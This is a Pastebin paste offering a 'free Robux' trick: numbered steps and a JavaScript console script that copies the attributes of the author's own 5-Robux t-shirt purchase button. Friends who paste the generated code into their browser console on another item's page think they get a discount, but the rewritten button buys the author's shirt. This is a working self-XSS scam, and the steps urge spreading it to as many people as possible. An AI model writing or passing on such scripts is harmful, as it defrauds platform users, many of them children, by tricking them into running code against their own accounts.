Advertisement
URBAN420NETWORK

Free Robux Using Catalog

Oct 26th, 2016
7,042
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //How to get free ROBUX using the catalog
  2. //step 1) create a t-shirt and make the price 5 robux
  3. //step 2) go to the buy page for your t-shirt and press Ctrl+Shift+J (only works on chrome)
  4. //step 3) copy this entire script and paste in in the console
  5. //step 4) it should say some stuff starting with //script by urban and ending with //created by urban
  6. //step 5) copy the stuff between those two lines and save it somewhere
  7. //step 6) tell a friend you can make any item 5 robux
  8. //step 7) if they ask how tell them to go to the buy page of any item, then tell them to press Ctrl+Shift+J, then send them the code you copied that starts with //script by urban and ends with //created by urban and then once they do that they can press the buy button and the item will only cost 5 robux instead of whatever price, if they buy it you will get 5 robux and they get the item discounted
  9. //step 8) do step 6 and step 7 but with as many people as you can find for more robux
  10.  
  11.  
  12. var btnData = document.getElementsByClassName("btn-fixed-width-lg btn-primary-lg PurchaseButton")[0].attributes;
  13. var buyData = document.getElementById("item-container").attributes;
  14. var newScript = "var btnData = document.getElementsByClassName('btn-fixed-width-lg btn-primary-lg PurchaseButton')[0];\nvar buyData = document.getElementById('item-container');";
  15.  
  16. function loadAttributes(data, name) {
  17.     for(var i = 0; i < data.length; i++) {
  18.         newScript += "\n" + name + ".setAttribute('" + data[i].name + "', '" + data[i].value + "');";
  19.     }
  20. }
  21.  
  22. loadAttributes(btnData, 'btnData');
  23. loadAttributes(buyData, 'buyData');
  24.  
  25. console.log("//script by urban420 network\n" + newScript + "\n//created by urban420 network");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement